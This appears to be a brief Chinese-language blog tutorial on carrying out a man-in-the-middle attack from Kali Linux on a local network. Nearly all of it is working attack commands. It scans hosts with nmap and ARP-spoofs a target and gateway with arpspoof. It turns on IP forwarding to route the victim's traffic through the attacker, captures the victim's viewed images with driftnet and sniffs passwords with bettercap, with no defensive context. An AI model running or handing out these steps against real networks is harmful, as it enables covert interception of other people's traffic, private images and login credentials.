使用kali進行中間人攻擊

##掃描局域網中存活的主機
nmap -sS 192.168.1.*

##對網關地址進行染毒
arpspoof -t 192.168.1.56 -r 192.168.1.1
此時目標主機192.168.1.56出現假的斷網

##開啓路由轉發 將目標主機的流量流進攻擊機
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
回車以後會出現1,此時目標機的網絡恢復正常

##對圖片進行嗅探
driftnet -i eth0
打開driftnet查看目標機瀏覽圖片

##創建文件夾存儲目標機所瀏覽的圖片
driftnet -i eth0 -a -d xuegod -s

##開始密碼嗅探
bettercap -X

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章